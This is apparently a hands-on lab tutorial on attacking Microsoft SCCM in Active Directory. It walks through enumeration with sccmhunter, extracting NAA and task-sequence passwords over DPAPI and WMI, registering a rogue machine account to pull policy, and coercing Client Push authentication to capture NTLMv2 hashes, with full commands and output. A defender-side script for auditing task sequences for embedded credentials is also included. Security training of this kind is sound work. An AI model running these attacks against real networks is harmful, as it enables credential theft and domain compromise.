SCCM Exploitation
1. SCCM Enumeration
SCCM is an optional service; not every organization installs it.
An AD in which SCCM is deployed typically shows the following characteristics:
- A new container named CN=System Management,CN=System is created; its contents reveal the different site servers and their roles
- New LDAP object class entries are created, for example mssmsmanagementpoint or mssmssite
1.1. Enumerating SCCM with sccmhunter
The sccmhunter tool can perform a variety of attacks and enumeration operations. It covers several ways of abusing SCCM, including enumeration, and supports multiple attack scenarios.
1.1.1. Installing sccmhunter
uv tool install git+https://github.com/garrettfoster13/sccmhunter
1.1.2. Enumerating SCCM
sccmhunter can help us enumerate the following:
- The SCCM site code.
- Whether the server is a Central Administration Site (CAS).
- SMB signing status (useful for a later NTLM relay attack).
- Whether the server is an SCCM Primary Site Server.
- Whether the server is an SCCM Distribution Point.
- Whether the server is an SCCM SMS Provider.
- Whether WSUS and MSSQL services are running on the server.
1.1.3. LDAP enumeration with sccmhunter
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py find -u blwasp -p Password123! -d lab.local -dc-ip 172.50.0.10
SCCMHunter v2.0.0 by @unsigned_sh0rt
[10:57:49] INFO [!] First time use detected.
[10:57:49] INFO [!] SCCMHunter data will be saved to /root/.sccmhunter
[10:57:52] INFO [*] Checking for System Management Container.
[10:57:53] INFO [+] Found System Management Container. Parsing DACL.
[10:57:55] INFO [+] Found 2 computers with Full Control ACE
[10:57:55] INFO [*] Querying LDAP for published Sites and Management Points
[10:57:56] INFO [+] Found 1 Management Points in LDAP.
[10:57:56] INFO [*] Querying LDAP for potential PXE enabled distribution points
[10:57:56] INFO [+] Found 1 potential Distribution Points in LDAP.
[10:57:57] INFO [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'
[10:57:58] INFO [+] Found 9 principals that contain the string 'SCCM' or 'MECM'.
The find command uses LDAP queries to identify the presence of SCCM-related infrastructure:
- Checks the DACL of the System Management container, which is created manually during the AD schema extension
- Checks the published Management Points
- Searches the whole directory for the strings SCCM and MECM
Use the -debug option while running the command, or run show -all afterwards, to view the results.
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py show -all
SCCMHunter v2.0.0 by @unsigned_sh0rt
[10:58:43] INFO [+] Showing SiteServers Table
[10:58:43] INFO +------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer | SMSProvider | Config | MSSQL |
+==================+============+=======+=================+==============+===============+==========+=========+
| sccm02.lab.local | | | | True | | | |
+------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| sccm01.lab.local | | | | True | | | |
+------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
[10:58:43] INFO [+] Showing ManagementPoints Table
[10:58:43] INFO +------------------+------------+-----------------+
| Hostname | SiteCode | SigningStatus |
+==================+============+=================+
| sccm01.lab.local | HTB | |
+------------------+------------+-----------------+
[10:58:43] INFO [+] Showing USERS Table
[10:58:43] INFO +------------+------------+------------------+------------------------+---------------+
| cn | name | sAMAAccontName | servicePrincipalName | description |
+============+============+==================+========================+===============+
| sccm_push | sccm_push | sccm_push | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_naa | sccm_naa | sccm_naa | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_admin | sccm_admin | sccm_admin | | |
+------------+------------+------------------+------------------------+---------------+
| sccm_sql | sccm_sql | sccm_sql | | |
+------------+------------+------------------+------------------------+---------------+
[10:58:43] INFO [+] Showing GROUPS Table
[10:58:43] INFO +------------+------------+------------------+----------------------------------------+---------------+
| cn | name | sAMAAccontName | member | description |
+============+============+==================+========================================+===============+
| SCCM_users | SCCM_users | SCCM_users | CN=Rai MC,CN=Users,DC=lab,DC=local | |
| | | | CN=sccm_push,CN=Users,DC=lab,DC=local | |
| | | | CN=sccm_naa,CN=Users,DC=lab,DC=local | |
| | | | CN=sccm_admin,CN=Users,DC=lab,DC=local | |
| | | | CN=sccm_sql,CN=Users,DC=lab,DC=local | |
+------------+------------+------------------+----------------------------------------+---------------+
[10:58:43] INFO [+] Showing COMPUTERS Table
[10:58:43] INFO +--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+====================+============+=================+==============+===================+=====================+===============+========+=========+
| sccm02.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm01.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SQL.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM02.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM-SMS.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM01.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
[10:58:43] INFO [+] Showing SiteDatabases Table
[10:58:43] INFO +------------+---------+
| Hostname | MSSQL |
+============+=========+
+------------+---------+
1.1.4. Enumeration with the sccmhunter SMB module
Use the smb module to analyze and list the SMB shares of the identified SCCM servers. The module checks several services exposed in a default configuration, including SMB, HTTP(S) and MSSQL. Reconnaissance is split into three parts. To enumerate SCCM with the smb option we must be able to connect to the various services being checked.
Profiling the site servers:
- Validates connectivity: confirms whether the target server is online.
- Validates whether the site server hosts an MSSQL service: checks whether a database is running on the server.
- Determines whether the site server is "active" or "passive": in an SCCM high-availability setup, identifies the active and standby nodes.
- Identifies whether the site server is a Central Administration Site (CAS): determines its position in the SCCM hierarchy.
Management Point validation:
- Validates connectivity to the HTTP endpoint: checks whether the web services associated with the Management Point respond normally.
Checking roles and configuration:
- Searches the default file shares for the associated site code: confirms the server's identity by reading share files (such as SMS_<site code>).
- Checks whether SMB signing is disabled: identifies an opportunity for NTLM relay attacks.
- Identifies site system roles: for example Site Server, Management Point, Distribution Point, SMS Provider, MSSQL and WSUS.
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py smb -u blwasp -p Password123! -d lab.local -dc-ip 172.50.0.10 -save
SCCMHunter v2.0.0 by @unsigned_sh0rt
[11:01:56] INFO Profiling 2 site servers.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Site Servers.
[11:01:56] INFO +------------------+-------------------+-------+-----------------+--------------+---------------+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer | SMSProvider | Config | MSSQL |
+==================+===================+=======+=================+==============+===============+==========+=========+
| sccm02.lab.local | Connection Failed | | | True | | | |
+------------------+-------------------+-------+-----------------+--------------+---------------+----------+---------+
| sccm01.lab.local | Connection Failed | | | True | | | |
+------------------+-------------------+-------+-----------------+--------------+---------------+----------+---------+
[11:01:56] INFO [+] Finished profiling potential Site Databases.
[11:01:56] INFO +------------+---------+
| Hostname | MSSQL |
+============+=========+
+------------+---------+
[11:01:56] INFO Profiling 1 management points.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Management Points.
[11:01:56] INFO +------------------+------------+-----------------+
| Hostname | SiteCode | SigningStatus |
+==================+============+=================+
| sccm01.lab.local | HTB | |
+------------------+------------+-----------------+
[11:01:56] INFO Profiling 1 distribution points.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling Distribution Points.
[11:01:56] INFO +---------------+-----------------+--------+-------+
| Hostname | SigningStatus | SCCM | WDS |
+===============+=================+========+=======+
| SQL.lab.local | | | |
+---------------+-----------------+--------+-------+
[11:01:56] INFO Profiling 6 computers.
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [-] SMB SessionError: No answer!
[11:01:56] INFO [+] Finished profiling all discovered computers.
[11:01:56] INFO +--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+====================+============+=================+==============+===================+=====================+===============+========+=========+
| sccm02.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm01.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SQL.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM02.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM-SMS.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| SCCM01.lab.local | | | | | | | | |
+--------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
-save: if a PXE boot variables file is found, it is saved.
The PXE boot variables file customizes and automates the boot process of network devices, directing them with specific parameters (such as the boot image location, network settings and scripts); this ensures efficient deployment of operating systems and configurations across many devices. The file may leak critical network configuration and credential information.
1.2. SharpSCCM enumeration
2. Abusing SCCM
With the reconnaissance phase complete, the next step is to obtain privileges on the SCCM infrastructure.
2.1. Credential Harvesting
Credentials can be found in the client database, in logs or in the CIM cache. This is especially true for SCCM servers acting as Management Points, where credentials may be stored or transmitted. Typically the stored credentials are encrypted with DPAPI, so high local privileges are required to decrypt them (hence a privileged user must be obtained first).
2.1.1. Where credentials are commonly found
The following are common places where credentials can be obtained:
1. Device Collection Variables:
Collections are the mechanism for grouping the machines of an SCCM environment; through them, deployments can be performed on many machines at once. SCCM has default collections, and administrators can also create custom ones (for example "Windows Server 2019 devices"). Device collection variables are key-value pairs associated with these collections. They store information that can be referenced during deployment, for example parameters used in the task sequences that install applications or apply configuration settings. While these variables can dynamically control deployment behaviour and conditions, they may also contain sensitive identifiers or credentials.
2. Task Sequence Variables:
A task sequence is a set of steps configured to perform a specific operation, for example a "join the machine to the domain" task sequence. The variables it contains can be used to store various identifiers.
3. Network Access Accounts (NAAs):
An NAA is a domain account created specifically so that a machine can retrieve data from the Distribution Points of the SCCM hierarchy when it cannot use its own account (for example, before it has joined the domain). The NAA identity information is obtained through the SCCM policy sent by the server and can be stored on disk encrypted with DPAPI.
Even after the NAA identifiers are deleted or changed, the binary files still contain the encrypted identifiers.
Moreover, even without access to an already compromised machine, the NAA can be obtained by posing as a new machine on the network and requesting the SCCM policy from the server. Although the NAA usually has no special privileges, administrators sometimes use a highly privileged account for this role.
In short, if we can obtain an administrator account on a server configured with SCCM, we can decrypt DPAPI and retrieve the secrets held on the machine. We can do this remotely with sccmhunter.
2.1.2. Retrieving SCCM secrets with sccmhunter
sccmhunter lets us retrieve SCCM secrets remotely. To do so we use the dpapi module and specify one of the following methods:
- -wmi: extracts SCCM secrets stored in the WMI repository
- -disk: extracts SCCM secrets from disk (OBJECTS.DATA), which helps recover secrets that may have been changed or deleted
- -both: combines the two methods above
# Retrieve the secrets via WMI
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py dpapi -u rai -p Pxetesting01 -d lab.local -dc-ip 172.50.0.10 -target 172.50.0.21 -wmi
SCCMHunter v2.0.0 by @unsigned_sh0rt
[11:20:48] INFO [*] Starting SCCM secrets extraction via WMI
[11:20:52] INFO [+] Found NAA credentials
[11:21:53] INFO - NetworkAccessUsername: LAB\sccm_naa
[11:21:53] INFO - NetworkAccessPassword: Password123!
[11:21:56] INFO [+] Found Task Sequence
[11:21:56] INFO - Task Sequence: <sequence version="3.10"><step type="SMS_TaskSequence_RunCommandLineAction" name="Run Command Line" description="" runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false"><action>smsswd.exe /run: powershell -c "$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); $sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</action><defaultVarList><variable name="CommandLine" property="CommandLine" hidden="true">powershell -c "$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); $sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</variable><variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable><variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName"></variable><variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable><variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable><variable name="SMSTSRunCommandLineUserName" property="UserName"></variable></defaultVarList></step></sequence>
[11:21:58] INFO [+] Found Collection Variables
[11:21:58] INFO - CollectionVariableName: An_interesting_variable
[11:21:58] INFO - CollectionVariableValue: If needed : pusH_4ccoun7!
[11:21:59] INFO [*] WMI SCCM secrets dump complete
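As an added defender-side example (not part of these notes and not sccmhunter's own code), the following Python audits the task sequence XML returned in the dump above for credentials embedded directly in command lines, the kind of check an SCCM administrator can run over exported task sequences before an attacker reads them out of WMI. The sample XML is the one shown in the dump; the regex heuristics and the redact helper are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

# Task sequence XML exactly as returned in the sccmhunter dpapi dump above,
# embedded here as the sample input for the audit.
SAMPLE_TASK_SEQUENCE = (
    r'<sequence version="3.10">'
    r'<step type="SMS_TaskSequence_RunCommandLineAction" name="Run Command Line" description="" '
    r'runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">'
    r'<action>smsswd.exe /run: powershell -c "$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; '
    r'$cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); '
    r'$sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</action>'
    r'<defaultVarList>'
    r'<variable name="CommandLine" property="CommandLine" hidden="true">powershell -c '
    r'"$pass = ConvertTo-SecureString "adm1n5ccM!" -AsPlainText -Force; '
    r'$cred = New-Object System.Management.Automation.PSCredential("LAB\sccm_admin", $pass); '
    r'$sess = New-PSSession -Credential $cred -ComputerName SQL.lab.local"</variable>'
    r'<variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>'
    r'<variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>'
    r'<variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>'
    r'</defaultVarList></step></sequence>'
)

# Heuristic patterns (assumptions of this example) for secrets pasted straight into a
# command line: a plaintext SecureString, an explicit PSCredential user, or password switches.
SECRET_PATTERNS = {
    "plaintext SecureString": re.compile(r'ConvertTo-SecureString\s+"([^"]*)"\s+-AsPlainText', re.I),
    "PSCredential user": re.compile(r'PSCredential\("([^"]+)"', re.I),
    "password switch": re.compile(r'(?:/user:|/pass:|-Password)\s*(\S+)', re.I),
}

def audit_task_sequence(xml_text):
    """Return (step name, source, pattern label, matched value) for every embedded secret."""
    root = ET.fromstring(xml_text)
    findings = []
    for step in root.iter("step"):
        step_name = step.get("name", "<unnamed>")
        # Look at the <action> text and at every variable of the step, hidden ones included,
        # since the dump above shows the same command line duplicated in both places.
        sources = [("action", step.findtext("action") or "")]
        sources += [(v.get("name", "?"), v.text or "") for v in step.iter("variable")]
        for source, text in sources:
            for label, pattern in SECRET_PATTERNS.items():
                for match in pattern.finditer(text):
                    findings.append((step_name, source, label, match.group(1)))
    return findings

def redact(value):
    """Mask a matched value for reporting; keep the first character for correlation."""
    return value[:1] + "*" * (len(value) - 1)

if __name__ == "__main__":
    for step, source, label, value in audit_task_sequence(SAMPLE_TASK_SEQUENCE):
        print(f"[!] step={step!r} source={source} kind={label} value={redact(value)}")
```

Hidden variables are reported too, since hidden="true" only affects the console display and not what a client can decrypt.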
2.1.3. Requesting the SCCM policy to obtain the NAA manually
We can use a managed computer account to request the SCCM policy and obtain the NAA (Network Access Account) manually. We first need administrator privileges on a machine within the domain.
# Create a computer account
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# addcomputer.py -computer-name 'hack$' -computer-pass 'Admin123' -dc-ip 172.50.0.10 'LAB.LOCAL/Blwasp':'Password123!'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account hack$ with password Admin123.
Use the http module to impersonate a standard client enrollment, obtain the NAA credentials from the discovered Management Points, and retrieve the policy with the computer account hack$ we just created. The module automatically extracts and decrypts the NAA credentials.
┌──(root㉿kali)-[~/Desktop/htb/Academy/mssql]
└─# sccmhunter.py http -u blwasp -p 'Password123!' -dc-ip 172.50.0.10 -cn 'hack$' -cp 'Admin123' -debug
SCCMHunter v1.0.5 by @garrfoster
[11:24:04] INFO [*] Searching for Management Points from database.
[11:24:05] INFO [+] Found http://sccm01.lab.local/ccm_system_windowsauth
[11:24:05] INFO [*] Attempting to grab policy from sccm01.lab.local
[11:24:05] DEBUG [*] Creating certificate for our fake server...
[11:24:05] DEBUG [*] Registering our fake server...
[11:24:06] INFO [*] Done.. our ID is BFBE52FA-C563-4FFF-9BC8-9D6BC3D67A9D
[11:24:06] INFO [*] Waiting 10 seconds for database to update.
[11:24:16] DEBUG [*] Requesting NAAPolicy.. 2 secs
[11:24:16] DEBUG [*] Parsing for Secretz...
[11:24:18] INFO [+] Got NAA credential: LAB\sccm_naa:SCCMCreds01!
[11:24:18] INFO [+] Got NAA credential: LAB\sccm_naa:SCCMCreds01!
[11:24:18] INFO [+] Done.. decrypted policy dumped to /home/plaintext/.sccmhunter/logs/loot/sccm01_naapolicy.xml
The -auto option can be used to create the machine account automatically and recover the policy with the supplied credentials.
2.1.4. Client Push Exploitation (DDR)
The Client Push account deployment mechanism is vulnerable to NTLM authentication coercion.
Principle: a Data Discovery Record (DDR) request is sent to the Management Point, and the Heartbeat Discovery mechanism then updates the hardware inventory and client information.
By forging a DDR request that states that the SCCM client is not installed on a particular machine, the primary site server, on receiving this information, immediately attempts to install the SCCM client on the system named in the forged message. This causes each Client Push account to authenticate in turn; these accounts usually hold local administrator rights and in some cases even domain administrator rights. If all of these accounts fail, the site server finally falls back to its own computer account to attempt the installation.
For Client Push Exploitation to work, the SCCM deployment must meet specific prerequisites:
- The KB15599094 patch, which disables NTLM authentication, has not been applied
- NTLM has not been manually disabled
- HTTPS is not in use
- Client Push accounts do not authenticate with PKI certificates
This attack must be executed with SharpSCCM from a domain-joined Windows machine; we then use Inveigh to capture the hashes.
PS C:\Tools> .\SharpSCCM.exe invoke client-push -t 172.50.0.51
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209CA0201033082098606092A864886F70D010701A0820977048209733082096F3082058806092A864886F70D010701A0...SNIP...
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: 172.50.0.51
NetBIOS name: 172.50.0.51
Site code: HTB
[+] Sending HTTP registration request to SCCM01.lab.local:80
[+] Received unique SMS client GUID for new device:
GUID:7A77FDCB-4C7C-4A9D-84D0-85601E5BDE37
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7A77FDCB-4C7C-4A9D-84D0-85601E5BDE37 to MP_DdrEndpoint endpoint on SCCM01.lab.local:HTB and requesting client installation on 172.50.0.51
[+] Completed execution in 00:00:06.4031058
PS C:\Tools> .\Inveigh.exe
[*] Inveigh 0.913 started at 2024-07-10T20:26:22
[*] Process ID = 2336
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.50.0.51
[+] Spoofer IP Address = 172.50.0.51
...SNIP...
[+] Output Directory = C:\Tools
[*] Press ESC to access console
sccm_test::LAB:F701CD0BEF81F601:52AD33FC58EDFFE795116E8A12EEDC4F:0101000000000000F86871...SNIP...
[!] [2024-07-10T20:30:12] SMB(445) NTLMv2 written to Inveigh-NTLMv2.txt
[+] [2024-07-10T20:30:12] TCP(445) SYN packet from 172.50.0.21:59514
[+] [2024-07-10T20:30:12] SMB(445) NTLM challenge 0047628E5BDF8905 sent to 172.50.0.21:59514
[+] [2024-07-10T20:30:12] SMB(445) NTLMv2 ignored for LAB\SCCM01$ from 172.50.0.21(SCCM01):59514:
[machine account]
We can then try to crack the captured hashes.